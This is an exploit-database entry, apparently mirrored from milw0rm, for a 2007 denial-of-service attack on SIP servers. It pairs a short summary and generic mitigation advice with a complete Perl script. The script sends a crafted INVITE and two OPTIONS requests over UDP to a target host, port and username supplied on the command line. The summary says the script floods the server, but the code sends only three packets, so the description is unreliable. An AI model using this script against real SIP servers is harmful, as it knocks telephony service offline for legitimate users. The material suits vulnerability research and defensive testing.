header-logo
Suggest Exploit
vendor:
Unknown
by:
Unknown
7.5
CVSS
HIGH
Denial of Service
400
CWE
Product Name: Unknown
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE: Unknown
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Perl SIP INVITE and OPTIONS Requests Denial of Service

This Perl script sends INVITE and OPTIONS requests to a SIP server, causing a Denial of Service (DoS) by flooding the server with these requests. The script uses the IO::Socket::INET module to create a UDP socket and send the requests. The requests are sent with specific headers and parameters to target a specific user on the SIP server. This vulnerability allows an attacker to disrupt the SIP server and potentially render it unavailable for legitimate users.

Mitigation:

To mitigate this vulnerability, it is recommended to implement rate limiting or traffic filtering mechanisms on the SIP server to prevent excessive requests from a single source. Additionally, keeping the server software up to date with security patches can help protect against known vulnerabilities.
Source

Exploit-DB raw data:

#!/usr/bin/perl
use IO::Socket::INET;

die "Usage $0 <dst> <port> <username>" unless ($ARGV[2]);

 

$socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1],

        Proto=>'udp',

        PeerAddr=>$ARGV[0]);

 

$msg = "INVITE sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP\t192.168.1.2;rport;branch=00\r\nFrom: <sip:gasparin\@192.168.1.2>;tag=00\r\nTo: <sip:$ARGV[2]\@$ARGV[0]>;tag=00\r\nCall-ID: et\@192.168.1.2\r\nCSeq: 10 INVITE\r\nContent-Length: 0\r\n\r\n";;

$socket->send($msg);

 

sleep(1);

$msg ="OPTIONS sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP 192.168.1.2;rport;branch=01\r\nFrom: <sip:gasparin\@192.168.1.2>;tag=01\r\nTo: <sip:$ARGV[2]\@$ARGV[0]>\r\nCall-ID: et\@192.168.1.2\r\nCSeq: 11 OPTIONS\r\nContent-Length: 0\r\n\r\n";

$socket->send($msg);

 

sleep(1);

$msg ="OPTIONS sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP 192.168.1.2;rport;branch=02\r\nFrom: <sip:gasparin\@192.168.1.2>;tag=02\r\nTo: <sip:$ARGV[2]\@$ARGV[0]>\r\nCall-ID: et\@192.168.1.2\r\nCSeq: 12 OPTIONS\r\nContent-Length: 0\r\n\r\n";

$socket->send($msg);

# milw0rm.com [2007-08-21]

Navigation

Suggest Exploit

Services By CQR